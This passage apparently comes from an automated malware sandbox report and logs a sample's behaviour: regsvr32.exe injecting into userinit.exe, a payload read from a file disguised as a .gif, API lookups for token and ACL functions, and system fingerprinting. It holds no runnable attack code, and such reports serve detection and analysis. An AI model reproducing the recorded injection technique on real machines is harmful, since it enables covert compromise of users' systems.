pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x00600fff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x00604fff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x00608fff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x0060cfff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x00610fff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x00614fff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x00618fff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x0061cfff	Private Memory	rw	-
pagefile_0x0000000000580000	0x00580000	0x00581fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00590000	0x00590fff	Memory Mapped File	r	-
private_0x0000000000620000	0x00620000	0x0062ffff	Private Memory	rw	-
private_0x0000000000630000	0x00630000	0x0072ffff	Private Memory	-	-
pagefile_0x0000000000730000	0x00730000	0x0080efff	Pagefile Backed Memory	r	-
private_0x0000000000810000	0x00810000	0x009affff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x0091cfff	Private Memory	rw	-
private_0x0000000000970000	0x00970000	0x009affff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a32fff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a36fff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a3afff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a3efff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a42fff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a46fff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a4afff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a4efff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a52fff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a56fff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a5afff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a5efff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a62fff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a66fff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a6afff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00a6efff	Private Memory	rw	-
userinit.exe	0x00a70000	0x00a78fff	Memory Mapped File	rwx	-
pagefile_0x0000000000a80000	0x00a80000	0x0167ffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01680000	0x01faffff	Memory Mapped File	r	-
pagefile_0x0000000001fb0000	0x01fb0000	0x023a2fff	Pagefile Backed Memory	r	-
private_0x00000000023b0000	0x023b0000	0x024affff	Private Memory	rw	-
private_0x00000000024b0000	0x024b0000	0x026affff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02750fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02754fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02758fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0275cfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02760fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02764fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02768fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0276cfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02770fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02774fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02778fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0277cfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02782fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02786fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0278afff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0278efff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02794fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02798fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0279cfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027a2fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027a6fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027aafff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027aefff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027b4fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027b8fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027bcfff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02842fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02846fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0284afff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0284efff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02864fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02868fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0286cfff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02870fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x02886fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x0288afff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x0288efff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x028a4fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x028a8fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x028acfff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x028b0fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028c6fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028cafff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028cffff	Private Memory	-	-
private_0x0000000002850000	0x02850000	0x02920fff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x02962fff	Private Memory	rw	-
private_0x0000000002890000	0x02890000	0x02980fff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x029c2fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029e2fff	Private Memory	rwx	-
private_0x00000000029f0000	0x029f0000	0x02aeffff	Private Memory	-	-
private_0x0000000002af0000	0x02af0000	0x02b2ffff	Private Memory	rw	-
private_0x0000000002cb0000	0x02cb0000	0x02daffff	Private Memory	rw	-
sortdefault.nls	0x02db0000	0x0307efff	Memory Mapped File	r	-
comctl32.dll	0x6d740000	0x6d7c3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d820000	0x6d838fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffd9008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0xafc, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d820000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d740000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ôì, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d77266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d772542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d771d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d77238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7720c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d771fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d771e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d771f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d771ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d77216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7722be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7721e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8220ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8220b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8220c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8220d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 1183727	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #64: userinit.exe

222

0

»

Information	Value
ID	#64
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:04:10, Reason: Child Process
Unmonitor	End Time: 00:04:14, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0xb6c
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x B14 0x B10 0x AF4

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x0010ffff	Private Memory	rw	-
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	rwx	-
pagefile_0x0000000000120000	0x00120000	0x00126fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000130000	0x00130000	0x00131fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00140000	0x00140fff	Memory Mapped File	r	-
private_0x0000000000150000	0x00150000	0x00150fff	Private Memory	rwx	-
pagefile_0x0000000000160000	0x00160000	0x00161fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00170000	0x00170fff	Memory Mapped File	r	-
private_0x0000000000180000	0x00180000	0x0027ffff	Private Memory	rw	-
pagefile_0x0000000000280000	0x00280000	0x00347fff	Pagefile Backed Memory	r	-
private_0x0000000000350000	0x00350000	0x003dffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x005fffff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x0064ffff	Private Memory	rw	-
private_0x0000000000650000	0x00650000	0x0074ffff	Private Memory	-	-
private_0x0000000000760000	0x00760000	0x0076ffff	Private Memory	rw	-
private_0x0000000000770000	0x00770000	0x0095ffff	Private Memory	rw	-
pagefile_0x0000000000770000	0x00770000	0x0084efff	Pagefile Backed Memory	r	-
private_0x0000000000850000	0x00850000	0x008d0fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008d4fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008d8fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008dcfff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008e0fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008e4fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008e8fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008ecfff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008f0fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008f4fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008f8fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008fcfff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x00900fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x00904fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x00908fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x0090cfff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x00910fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x00914fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x00918fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x0091cfff	Private Memory	rw	-
private_0x0000000000920000	0x00920000	0x0095ffff	Private Memory	rw	-
private_0x0000000000960000	0x00960000	0x00a6cfff	Private Memory	rw	-
userinit.exe	0x00a70000	0x00a78fff	Memory Mapped File	rwx	-
pagefile_0x0000000000a80000	0x00a80000	0x0167ffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01680000	0x01faffff	Memory Mapped File	r	-
pagefile_0x0000000001fb0000	0x01fb0000	0x023a2fff	Pagefile Backed Memory	r	-
private_0x00000000023b0000	0x023b0000	0x024affff	Private Memory	rw	-
private_0x00000000024b0000	0x024b0000	0x026affff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02732fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02736fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0273afff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0273efff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02742fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02746fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0274afff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0274efff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02752fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02756fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0275afff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0275efff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02762fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02766fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0276afff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0276efff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02772fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02776fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0277afff	Private Memory	rw	-
